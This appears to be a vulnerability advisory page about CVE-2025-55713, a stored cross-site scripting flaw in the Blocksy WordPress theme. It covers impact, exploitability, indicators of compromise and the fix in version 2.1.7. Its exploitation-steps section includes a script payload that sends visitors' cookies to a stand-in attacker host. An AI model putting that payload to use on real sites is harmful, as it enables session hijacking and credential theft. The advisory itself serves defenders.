CVE-2025-55713
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-55713 is a Stored Cross-Site Scripting (XSS) vulnerability in the Blocksy WordPress theme developed by Creative Themes. It affects all versions of the Blocksy theme up to and including 2.1.6, and was reported by researcher savphill on July 31, 2025, then published by Patchstack on August 14, 2025. The vulnerability carries a CVSS v3.1 base score of 5.9 (Medium) (Patchstack, Red Hat CVE).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically of the stored variant. Exploitation requires an authenticated attacker with at least Shop Manager-level privileges to inject malicious script content that is persistently stored and later rendered in victims' browsers. Successful exploitation also requires user interaction — a privileged user must perform an action such as visiting a crafted page — making this a stored XSS with a reflected execution path for site visitors (Patchstack).

Impact

Successful exploitation allows an attacker to inject and persistently store malicious JavaScript or HTML payloads within the affected WordPress site, which are then executed in the browsers of visiting users. This can lead to session hijacking, credential theft, unauthorized redirects, defacement, or delivery of malicious content to site visitors. The impact is limited to confidentiality and integrity of client-side data, with no direct server-side code execution (Patchstack).

Exploitability

No public proof-of-concept exploit code or in-the-wild exploitation has been reported for CVE-2025-55713. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.031% (0.000310), indicating a very low probability of exploitation in the near term. Patchstack rates this as low priority, noting it is unlikely to be exploited, though they acknowledge that XSS vulnerabilities of this class can be used in mass-exploit campaigns targeting WordPress sites (Patchstack).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites using the Blocksy theme at version 2.1.6 or earlier, using tools like WPScan or by inspecting page source for theme metadata.
  2. Obtain privileged access: Acquire or compromise an account with at least Shop Manager privileges on the target WordPress site.
  3. Inject malicious payload: Navigate to the theme settings or a relevant input field within the Blocksy theme's admin interface and inject a stored XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>).
  4. Trigger execution: Wait for a privileged user (e.g., administrator) or site visitor to load the page or section containing the injected payload, causing the malicious script to execute in their browser.
  5. Achieve objective: Harvest session cookies, redirect users to phishing pages, or deliver further malicious content (Patchstack).

Indicators of compromise

  • Logs: WordPress admin access logs showing unusual POST requests to theme settings or customizer endpoints from unexpected IP addresses or user accounts with Shop Manager roles.
  • File System: Unexpected modifications to theme files or database entries containing <script> tags, JavaScript event handlers, or encoded payloads in theme option fields.
  • Network: Outbound requests from site visitors' browsers to unknown external domains shortly after loading pages rendered by the Blocksy theme, potentially indicating cookie or credential exfiltration.
  • Database: WordPress wp_options table entries for Blocksy theme settings containing obfuscated or unexpected JavaScript content.

Mitigation and workarounds

The vulnerability is patched in Blocksy theme version 2.1.7. Site administrators should update the Blocksy theme to version 2.1.7 or later immediately via the WordPress admin dashboard or by downloading the latest version from the theme repository. If an immediate update is not possible, restrict Shop Manager and similar privileged role access to trusted users only, and consider using a web application firewall (WAF) with XSS filtering rules as a temporary mitigation (Patchstack).

Community reactions

The vulnerability was disclosed through Patchstack's Active Vulnerability Disclosure Program (VDP) and received limited broader industry attention, consistent with its medium/low severity rating. RedPacketSecurity shared the CVE alert on social media shortly after publication. No notable researcher commentary or significant media coverage beyond standard vulnerability aggregator listings has been identified (Patchstack).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-19089NONEN/A
  • product-input-fields-for-woocommerce
NoYesAug 10, 2026
CVE-2026-19077NONEN/A
  • copy-delete-posts
NoYesAug 10, 2026
CVE-2026-19075NONEN/A
  • all-in-one-video-gallery
NoYesAug 10, 2026
CVE-2026-19074NONEN/A
  • advanced-classifieds-and-directory-pro
NoYesAug 10, 2026
CVE-2026-19053NONEN/A
  • prosolution-wp-client
NoYesAug 10, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management